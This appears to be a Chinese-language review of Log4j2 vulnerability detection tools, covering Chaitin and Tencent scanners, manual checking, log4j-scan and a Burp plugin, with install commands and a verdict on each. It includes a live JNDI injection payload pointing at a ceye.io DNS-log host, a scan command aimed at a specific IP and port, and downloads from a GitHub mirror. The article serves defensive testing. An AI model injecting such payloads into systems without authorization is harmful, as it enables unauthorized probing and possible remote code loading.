1、长亭Log4j2 漏洞本地检测工具 【推荐使用】
wget --no-check-certificate https://log4j2-detector.chaitin.cn/dl/log4j2_local_scanner_linux_amd64.v3_1.tar.gz
tar -zxvf log4j2_local_scanner_linux_amd64.v3_1.tar.gz
./log4j2_local_scanner_linux_amd64.v3 -root ./ -output scan.log
测试结果:
可快速发现当前服务器存在log4j2风险的 jar 应用,工具效果好,推荐使用。
2、长亭Log4j2 漏洞在线检测工具
既可以上传单独 Jar 包,也可以打包成 zip 包一起上传。系统会递归解压检测。
测试结果:
既可以上传单独 Jar 包,也可以打包成 zip文件一起上传,系统会递归解压检测,工具效果好,推荐使用。
3、腾讯安全Log4j2漏洞在线检测工具
支持 Jar/Ear/War包上传,一键上传即可获取到检测结果。
检测地址:
测试结果:
支持 Jar/Ear/War包上传,一键上传即可获取到检测结果。缺点:只能检测单个文件,不推荐使用。
4、手动验证方法
首先在 ceye.io 平台获取一个子域名,尝试构造payload,插入请求数据包。
${jndi: ldap://7jtf8u.ceye.io }
通过 ceye.io 平台是否收到请求,初步判断目标环境是否存在漏洞。
测试结果:
缺点:只适合安全人员使用,效率低。
5、Log4j-scan 【无法使用】
一款用于查找log4j2漏洞的python脚本,支持url检测,支持HTTP请求头和POST数据参数进行模糊测试。
github项目地址:
https://github.com/fullhunt/log4j-scan
github项目地址:
https://github.com/fullhunt/log4j-scan
git clone https://g.huaxi.us/fullhunt/log4j-scan.git
pip install -r requirements.txt
python3 log4j-scan.py -u " http://114.67.175.224:10827 "
测试结果:
支持url检测,HTTP请求头和POST数据参数进行模糊测试。缺点:花费了大量的时候安装后,根本检测不到漏洞,无法使用。
6、Log4j2 burp被动扫描插件
通过插件的方式,将lLog4j2漏洞检测能力集成到burp,从而提升安全测试人员的漏洞发现能力。
github项目地址:
https://g.huaxi.us/f0ng/log4j2burpscanner/releases/download/0.18.4/log4j2burpscanner-0.18.4-jdk8.jar
下载后添加插件
设置 ceye dnslog config信息
访问URL,burpsuite抓包
发送到log4j2 Scanner,会自动检测
如下,说明漏洞存在。
测试结果:
通过插件的方式,将lLog4j2漏洞检测能力集成到burp,从而提升安全测试人员的漏洞发现能力。访问URL,burpsuite抓包,发送到log4j2 Scanner,会自动检测。
缺点:适合安全人员使用,效率低。